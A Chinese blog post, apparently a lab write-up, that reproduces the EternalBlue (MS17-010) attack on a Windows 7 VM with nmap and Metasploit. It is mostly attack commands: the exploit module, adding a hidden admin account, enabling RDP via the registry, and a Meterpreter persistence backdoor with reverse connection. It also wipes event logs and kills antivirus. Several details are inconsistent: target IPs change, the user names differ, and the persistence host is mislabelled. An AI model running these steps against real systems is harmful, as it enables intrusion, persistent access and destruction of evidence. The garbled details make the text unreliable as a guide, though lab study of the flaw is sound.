永恒系列 ---- 永恒之蓝漏洞复现

永恒系列 ---- 永恒之蓝漏洞复现

1、漏洞了解

1)永恒之蓝

** 永恒之蓝漏洞(MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用 NSA(National Security Agency,美国国家安全局)泄露的漏洞 “EternalBlue”(永恒之蓝)进行改造而成 。勒索病毒的肆虐,俨然是一场全球性互联网灾难,给广大电脑用户造成了巨大损失。据统计,全球 100 多个国家和地区超过 10 万台电脑遭到了勒索病毒攻击、感染。

2)原理

** 永恒之蓝漏洞通过 TCP 的 445 和 139 端口,来利用 SMBv1 和 NBT 中的远程代码执行漏洞,通过恶意代码扫描并攻击开放 445 文件共享端口的 Windows 主机。只要用户主机开机联网,即可通过该漏洞控制用户的主机。不法分子就能在其电脑或服务器中植入勒索病毒、窃取用户隐私、远程控制木马等恶意程序。**

3)影响版本

包括不限于:WindowsNT,Windows2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。

2、复现

1) 准备环境

准备攻击机 :kali2021(IP:192.168.66.128)

目标机:Windows7(IP:192.168.66.130)

两个主机相互可以 ping 通且靶机开启 445 端口** **

2)扫描端口

nmap 192.168.66.130

图片.png

3)使用 msf 永恒之蓝漏洞模块

打开 msf

msfconsole

图片.png

扫描

搜索 ms17-010 漏洞

search ms17_010

找到扫描 & 攻击工具,先扫描再攻击

use auxiliary/scanner/smb/smb_ms17_010

设置目标 IP

set rhosts 192.168.50.132

run 一下

图片.png

绿加号那一行看到后面有的英文大概就是存在疑似可利用的永恒之蓝漏洞

攻击

使用 msf 的攻击模块

use exploit/windows/smb/ms17_010_eternalblue

设置攻击目标 IP

set rhosts 192.168.50.132

设置好之后查看一下配置情况

show options

图片.png

可以在这里设置一些东西:

set processinject explorer.exe** //**设置进程注入进入命令行下

set processinject lsass.exe** // 一分钟以后关机 **

set processinject winlogon.exe   // 设置进程注入取消受害电脑用户登录**(注销)**

set processinject wininit.exe   // 设置进程注入受害电脑蓝屏

确定无误输入 expolit 或 run 开始搞

图片.png

得到靶机 shell**(出现乱码输入 chcp 65001 解决)**

图片.png

在 shell 中输入 echo > test 可以将 kali 桌面的文件放在靶机的桌面

图片.png

在 shell 中创建用户

net user hacker 123456 /add             #创建用户
net localgroup administrators lfn /add  #提升权限
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f                       #打开远程桌面服务(端口3389)

图片.png

图片.png

4)实现控制

在 meterpreter 下可进行的部分操作:

#开关受害电脑键盘 / 鼠标:uictl** **

#开启或禁止键盘 / 鼠标:uictl [enable/disable] [keyboard/mouse/all]** **

#禁用鼠标: uictl disable mouse

#禁用键盘: uictl disable keyboard

#重新启动受害电脑的计算机:reboot

#清除事件日志:clearev

植入后门 : run persistence -X -i 5 -p 4444 -r 192.168.66.130

-X 在目标主机上开机自启动

-i 不断尝试反向连接的时间间隔

-r kali 的地址

#关闭防护软件:run killav

*****# 创建用户 :run post/windows/manage/enable_rdp USERNAME=user PASSWORD=123456 *****

图片.png

#开启受害电脑的远程桌面:run vnc

图片.png

通过前面 shell 的用户创建以及远程桌面服务的打开,可以在 kali 中再打开一个终端并输入实现远程操控

rdesktop 192.168.66.130

3、总结

** 永恒之蓝主要是通过恶意扫描 445 文件共享端口的 Windows 主机进行入侵,还有很多的操作这里还没有罗列完整,比如打开摄像头,记录键盘录入等,整个漏洞的复现过程基本完成,之后继续学习啦 ~**